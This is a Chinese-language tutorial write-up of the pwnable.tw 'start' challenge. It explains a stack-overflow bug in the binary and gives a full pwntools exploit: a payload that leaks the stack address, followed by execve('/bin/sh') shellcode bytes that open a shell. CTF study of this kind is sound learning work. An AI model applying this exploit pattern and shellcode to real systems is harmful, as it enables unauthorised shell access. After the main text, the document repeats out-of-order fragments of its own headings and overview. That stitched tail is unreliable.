Pwnable.tw - Start 题目分析与利用教学<\/h1>

一、题目概述<\/h2>
这是一个来自pwnable.tw平台的入门级pwn题目，名为"start"。题目考察基础的栈溢出利用技术，通过逆向分析和漏洞利用，最终获取shell权限。<\/p>

二、逆向分析<\/h2>

使用IDA Pro分析程序，程序逻辑非常简单：<\/p>

程序开始时在栈中保存esp的值和exit()函数的起始地址<\/li>
将eax、ebx、ecx、edx寄存器清零<\/li>
向栈中压入字符串"Let's start the CTF:"<\/li>

使用int 0x80系统调用进行输入输出操作

先调用4号功能(sys_write)输出字符串<\/li>
再调用3号功能(sys_read)接收用户输入<\/li> <\/ul> <\/li>

最后执行ret指令，跳转到exit()函数结束程序<\/li> <\/ol>

三、漏洞分析<\/h2>

关键漏洞点在于：<\/p>

程序使用int 0x80系统调用时：<\/p>

eax存放系统调用号<\/li>
ebx为文件描述符(fd)<\/li>
ecx指向缓冲区<\/li>
edx为缓冲区大小<\/li> <\/ul> <\/li>

漏洞形成：<\/p>

程序在输出和输入时使用相同的ecx值(指向栈缓冲区)<\/li>
输入时没有限制长度，可以覆盖栈上的数据<\/li>
如果输入超过20字节，将覆盖exit()函数的返回地址<\/li>

ret指令执行时会跳转到被覆盖的地址<\/li> <\/ul> <\/li> <\/ol>

四、漏洞利用步骤<\/h2>

1. 泄漏栈地址<\/h3>

由于ASLR的存在，我们需要先泄漏栈地址：<\/p>

构造payload覆盖返回地址为0x08048087<\/p>

这个地址对应mov ecx, esp<\/code>指令<\/li>
执行后会通过输出泄漏esp的值<\/li> <\/ul> <\/li>


接收泄漏的栈地址<\/p>
<\/li>
<\/ol>
2. 执行shellcode<\/h3>

准备execve("\/bin\/sh")的shellcode<\/li>
构造新的payload：

前20字节填充<\/li>
接着覆盖返回地址为(泄漏的栈地址 + offset)<\/li>
最后附加shellcode<\/li>
<\/ul>
<\/li>
<\/ol>
五、Exploit代码详解<\/h2>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span># 本地调试或远程连接<\/span>
<\/span><\/span>p =<\/span> process('.\/start'<\/span>)
<\/span><\/span># p = remote('chall.pwnable.tw', 10000)<\/span>
<\/span><\/span>
<\/span><\/span># execve("\/bin\/sh")的shellcode<\/span>
<\/span><\/span>shellcode =<\/span> "<\/span>\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73<\/span>"<\/span>
<\/span><\/span>shellcode +=<\/span> "<\/span>\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0<\/span>"<\/span>
<\/span><\/span>shellcode +=<\/span> "<\/span>\x0b\xcd\x80<\/span>"<\/span>
<\/span><\/span>
<\/span><\/span># 用于泄漏esp的地址<\/span>
<\/span><\/span>leak_addr =<\/span> 0x08048087<\/span>
<\/span><\/span>
<\/span><\/span># 第一阶段：泄漏栈地址<\/span>
<\/span><\/span>payload1 =<\/span> 'A'<\/span>*<\/span>20<\/span> +<\/span> p32(leak_addr)
<\/span><\/span>p.<\/span>send(payload1)
<\/span><\/span>p.<\/span>recvuntil("Let's start the CTF:"<\/span>)
<\/span><\/span>esp =<\/span> u32(p.<\/span>recv(4<\/span>))  # 接收泄漏的esp值<\/span>
<\/span><\/span>
<\/span><\/span># 计算shellcode的跳转地址<\/span>
<\/span><\/span>offset =<\/span> 20<\/span>
<\/span><\/span>payload2 =<\/span> 'A'<\/span> *<\/span> 20<\/span> +<\/span> p32(esp +<\/span> offset) +<\/span> shellcode
<\/span><\/span>p.<\/span>send(payload2)
<\/span><\/span>
<\/span><\/span># 获取交互式shell<\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span>p.<\/span>close()
<\/span><\/span><\/code><\/pre>六、关键点说明<\/h2>


shellcode构造<\/strong>：使用x86架构的汇编指令构造execve("\/bin\/sh")调用<\/p>

避免使用空字节(\x00)，防止输入被截断<\/li>
尽量保持精简<\/li>
<\/ul>
<\/li>

地址泄漏<\/strong>：选择0x08048087是因为：<\/p>

这个地址的指令会将esp值放入ecx<\/li>
后续输出调用会打印出栈地址<\/li>
<\/ul>
<\/li>

偏移计算<\/strong>：offset=20是因为：<\/p>

前20字节是填充数据<\/li>
接下来的4字节是返回地址<\/li>
shellcode从第24字节开始<\/li>
<\/ul>
<\/li>
<\/ol>
七、扩展思考<\/h2>

如果程序开启了NX保护，这种利用方式将失效，需要考虑ROP技术<\/li>
可以尝试不同的shellcode构造方式<\/li>
考虑如何绕过可能的输入过滤<\/li>
<\/ol>
通过这个简单的题目，可以学习到基础的栈溢出利用技术，包括地址泄漏、shellcode构造和跳转控制等核心概念。<\/p>

Pwnable.tw - Start 题目分析与利用教学<\/h1>

一、题目概述<\/h2> 这是一个来自pwnable.tw平台的入门级pwn题目，名为"start"。题目考察基础的栈溢出利用技术，通过逆向分析和漏洞利用，最终获取shell权限。<\/p>

四、漏洞利用步骤<\/h2>

一、题目概述<\/h2>
这是一个来自pwnable.tw平台的入门级pwn题目，名为"start"。题目考察基础的栈溢出利用技术，通过逆向分析和漏洞利用，最终获取shell权限。<\/p>